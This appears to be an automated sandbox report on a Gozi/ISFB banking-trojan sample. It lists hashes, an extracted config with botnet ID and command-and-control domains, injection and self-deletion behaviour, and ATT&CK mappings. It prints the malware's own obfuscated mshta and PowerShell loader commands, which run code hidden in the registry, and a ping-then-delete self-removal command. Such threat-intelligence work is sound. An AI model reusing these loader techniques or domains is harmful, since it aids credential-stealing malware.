gozi | 5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587

Analysis

max time kernel
151s
max time network
140s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
11-10-2023 08:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe
Size

267KB
MD5

5a84945991cf24c957cf67fd414c9f9a
SHA1

06206df47fd0805d616f31b5e56daa6378409e72
SHA256

5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587
SHA512

307f16d760c0adbeb829705e6db167c460c7d048da56049a8240c6cf6de69c2e6f41fcb9cca7c2e2ee03b8b5cbe8132f346fc3626c39e7f4de6c6d0cbfce2ed2
SSDEEP

6144:ZWO3FffE31kwsQODpAkVyakH7bWMxNTf:EOFf8lDsQsVyaOP5

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1680 cmd.exe

pid	process
1680	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2748 set thread context of 1280	2748	powershell.exe	Explorer.EXE
PID 1280 set thread context of 1680	1280	Explorer.EXE	cmd.exe
PID 1680 set thread context of 1976	1680	cmd.exe	PING.EXE
PID 1280 set thread context of 1112	1280	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1976 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1976 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3513876443-2771975297-1923446376-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1976	PING.EXE

pid	process
1976	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exepowershell.exeExplorer.EXE

pid	process
2144	5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe
2748	powershell.exe
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE
1280	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1280 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2748 powershell.exe
1280 Explorer.EXE
1680 cmd.exe
1280 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2748 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1280 Explorer.EXE

pid	process
1280	Explorer.EXE

pid	process
2748	powershell.exe
1280	Explorer.EXE
1680	cmd.exe
1280	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	2748	powershell.exe

pid	process
1280	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2924 wrote to memory of 2748	2924	mshta.exe	powershell.exe
PID 2924 wrote to memory of 2748	2924	mshta.exe	powershell.exe
PID 2924 wrote to memory of 2748	2924	mshta.exe	powershell.exe
PID 2748 wrote to memory of 1900	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1900	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 1900	2748	powershell.exe	csc.exe
PID 1900 wrote to memory of 2844	1900	csc.exe	cvtres.exe
PID 1900 wrote to memory of 2844	1900	csc.exe	cvtres.exe
PID 1900 wrote to memory of 2844	1900	csc.exe	cvtres.exe
PID 2748 wrote to memory of 2896	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 2896	2748	powershell.exe	csc.exe
PID 2748 wrote to memory of 2896	2748	powershell.exe	csc.exe
PID 2896 wrote to memory of 764	2896	csc.exe	cvtres.exe
PID 2896 wrote to memory of 764	2896	csc.exe	cvtres.exe
PID 2896 wrote to memory of 764	2896	csc.exe	cvtres.exe
PID 2748 wrote to memory of 1280	2748	powershell.exe	Explorer.EXE
PID 2748 wrote to memory of 1280	2748	powershell.exe	Explorer.EXE
PID 2748 wrote to memory of 1280	2748	powershell.exe	Explorer.EXE
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1680	1280	Explorer.EXE	cmd.exe
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1680 wrote to memory of 1976	1680	cmd.exe	PING.EXE
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe
PID 1280 wrote to memory of 1112	1280	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1280

C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe
"C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2144

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Asji='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Asji).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E\\\StopDiagram'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name blgorxiw -value gp; new-alias -name stgitclgt -value iex; stgitclgt ([System.Text.Encoding]::ASCII.GetString((blgorxiw "HKCU:Software\AppDataLow\Software\Microsoft\24F5F9D3-33BE-F6ED-DD98-178A614C3B5E").ListMail))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wh0gzywl.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1900

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES194C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC194B.tmp"
5⤵
PID:2844

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ozr-7xwv.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2896

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A07.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1A06.tmp"
5⤵
PID:764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\5633a46c25aced4b07728fd437b92c5e9102eabaa134ac584e2aae2e0adce587_JC.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1976

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES194C.tmp
Filesize
1KB

MD5
7e75388d7c0f010679b3be1b8470cb24

SHA1
51e68e86e4d647779a21a50758d0ea6f0a18eccb

SHA256
a6f54b786f6319cea5ba15043f04235bc9d118750c7b085cf3a2bddfa5d2c13c

SHA512
92da74a77f5c3e03f1fe78ac2805f6588279a632edc3d2ba36f4150a39f80df311b5707f5d8104c806584980b3d9da59e29159cfa7ed2e86b51efc2c8b828894

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1A07.tmp
Filesize
1KB

MD5
7d608de7b4a00cb707198acdf5f7da18

SHA1
2d0921bc69d16c4cfb41a7f2d4c83d9a2bec29bb

SHA256
c1fecb5ddc1c222567ea7e0735d2e0a04bef457f663bd8230cb9339628104154

SHA512
0f65785619791205afe4a6e331abaf7613ecaedddb40b99cc45f5e4c625ef76b97194d8d0bc82e102cdabfdb13fec8dc77b7974c046dcea31c5bcdc87dec8ae9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozr-7xwv.dll
Filesize
3KB

MD5
27f0bc5a8626dc8fbeb1a9ae11ffcaff

SHA1
709da0ea488b54954e8171a59e9b640cb5c8a258

SHA256
99e8e6bdac41bb386a54ecccaf605809c5fb30aa96467d91111e8cd5dffb1f14

SHA512
e9f116280a0c36f5882a2bc7ccf9701bcefee52c59833046733680717d8d0e95be3285387fe697b38164b951fa9a194e33677de6ad863dac905fbbfdc2ff2a0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ozr-7xwv.pdb
Filesize
7KB

MD5
bc6a03c1c873adf8becd47cc16188f58

SHA1
78ff4db49efab116c7d1851c67afeca073766702

SHA256
0bc3cfcd568f6a3e1ba5d6c83036c6bd3565ac2980533debbd32f7e81b059dca

SHA512
7a941982f9f61c342d4f8f5b9b435784c2ff84bb65a0fc20e21588b403b24b4c3cdfa0f646a911f8bedbb4467a0042a2229d8cfecdf0cec886691dcbd17a1659

Download Submit
C:\Users\Admin\AppData\Local\Temp\wh0gzywl.dll
Filesize
3KB

MD5
ddb7bbfa4dea63ce378d1fbb9a81fb6e

SHA1
2706c02efe49ab8fbec72fd7609bede5864c659e

SHA256
a82880a8488537c8b58917b0a799c9bd75419907b0e26a6640dbb8e507da0da6

SHA512
e3378d903be6a596ae4947fe55f9d2ef6265dde09fc0afe98c24169b641d2f206a716cda7bc7f29a66c6302b5fb70841154da669383ced91d8c6c304daf3193c

Download Submit
C:\Users\Admin\AppData\Local\Temp\wh0gzywl.pdb
Filesize
7KB

MD5
077f5f8c4c04d550dac4bbcc2f391255

SHA1
e19226dc522bde333d56cc2a6e28f555d66dc96c

SHA256
ad9def87b2886f9f8341995f7354e35f81c6559ae51b9ca045be99138dc7ec7b

SHA512
e5de8bf245b91e08a6e6ae1be261416e1d704daedd86925a4240acc0d14fb4433009fd0fb379e95b3489b551c812d443852dc4fe246b9513304673bf12a57aa9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC194B.tmp
Filesize
652B

MD5
571c61c806a0c45c8ca90f58da372856

SHA1
f1030112a24724295033ad4caa8d07d61f1a953a

SHA256
72ceff97628641ff5efbe35307f40607164aea7306b26773c5ffb6e7b18aa054

SHA512
a5551877b8dfa6d8788050bcdd21fa87dd385f0ca85286a684831512518521d4df7662b8fa69f8b31bcf43c55b8472456cf49d98b8ee9bd2b52d19f1ba697869

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1A06.tmp
Filesize
652B

MD5
26b61d19e7b38ac385e275d0ee49cf44

SHA1
c0af5295c8d75bdacda1e116eed879579b970def

SHA256
8c24cc81fa1d028e2591d4dcf323b54fc13c7f4834911200c55688828059f198

SHA512
4b1d7d8d9ab16cf37ddd439e00b7a420a3177bdcf90331b1fb0fda813f6722cd4b3c9316dc2b91d0c2e5470f1da00fa177b6bef9791e9908bf033c9d7cddfeed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ozr-7xwv.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ozr-7xwv.cmdline
Filesize
309B

MD5
2d45a3b130df359241a5aa2916980cce

SHA1
f1e425ad1be1d88a9f19eb37193a4c46334daf59

SHA256
755a5961f4299068f381389acb22121a360ae334456d4eb9a6eb9b5e9b2f5d28

SHA512
53542c9f24ef65342f905707de53ff08e52eb8387d2b7a5734ae4ed311855b6d2ee630501c12860698bfbf6c2213c2c2203145a94ca6a953e6dbdb3f816492bc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wh0gzywl.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wh0gzywl.cmdline
Filesize
309B

MD5
5176e2b9da0795932f5cabda05c42f82

SHA1
cd2feee8f639c4d6d4fa0048c4dca08218b989f4

SHA256
1638b0455d81ce3f6e4a46dffee67e3dc8d3534fa55dc2710757ae81dae203f2

SHA512
97774876fe4c92f97568061c98eb5d34f5ac3086f12512924d4d94d25adff5723167c83a132b64645e93cb0439422a3afc025ec96eede935fcefb237606d9e4e

Download Submit
memory/1112-97-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1112-98-0x0000000000270000-0x0000000000308000-memory.dmp

Filesize
608KB

Download
memory/1112-94-0x0000000000270000-0x0000000000308000-memory.dmp

Filesize
608KB

Download
memory/1112-106-0x0000000000270000-0x0000000000308000-memory.dmp

Filesize
608KB

Download
memory/1280-103-0x0000000005FF0000-0x0000000006094000-memory.dmp

Filesize
656KB

Download
memory/1280-69-0x0000000002A90000-0x0000000002A91000-memory.dmp

Filesize
4KB

Download
memory/1280-65-0x0000000005FF0000-0x0000000006094000-memory.dmp

Filesize
656KB

Download
memory/1680-79-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1680-81-0x0000000000310000-0x0000000000311000-memory.dmp

Filesize
4KB

Download
memory/1680-80-0x0000000000460000-0x0000000000504000-memory.dmp

Filesize
656KB

Download
memory/1680-105-0x0000000000460000-0x0000000000504000-memory.dmp

Filesize
656KB

Download
memory/1976-90-0x0000000001C50000-0x0000000001CF4000-memory.dmp

Filesize
656KB

Download
memory/1976-104-0x0000000001C50000-0x0000000001CF4000-memory.dmp

Filesize
656KB

Download
memory/1976-87-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1976-88-0x0000000000100000-0x0000000000101000-memory.dmp

Filesize
4KB

Download
memory/2144-7-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-5-0x0000000000240000-0x000000000024B000-memory.dmp

Filesize
44KB

Download
memory/2144-4-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download
memory/2144-3-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-2-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-6-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-1-0x0000000000240000-0x000000000024B000-memory.dmp

Filesize
44KB

Download
memory/2144-0-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download
memory/2144-8-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-13-0x00000000002E0000-0x00000000002ED000-memory.dmp

Filesize
52KB

Download
memory/2144-16-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/2144-18-0x0000000002550000-0x0000000002552000-memory.dmp

Filesize
8KB

Download
memory/2748-25-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2748-61-0x0000000002940000-0x0000000002948000-memory.dmp

Filesize
32KB

Download
memory/2748-76-0x000000001B1F0000-0x000000001B22D000-memory.dmp

Filesize
244KB

Download
memory/2748-71-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2748-73-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2748-72-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2748-64-0x000000001B1F0000-0x000000001B22D000-memory.dmp

Filesize
244KB

Download
memory/2748-67-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2748-23-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2748-44-0x0000000002930000-0x0000000002938000-memory.dmp

Filesize
32KB

Download
memory/2748-30-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2748-28-0x000007FEF4E80000-0x000007FEF581D000-memory.dmp

Filesize
9.6MB

Download
memory/2748-27-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2748-26-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/2748-24-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2896-52-0x0000000001F90000-0x0000000002010000-memory.dmp

Filesize
512KB

Download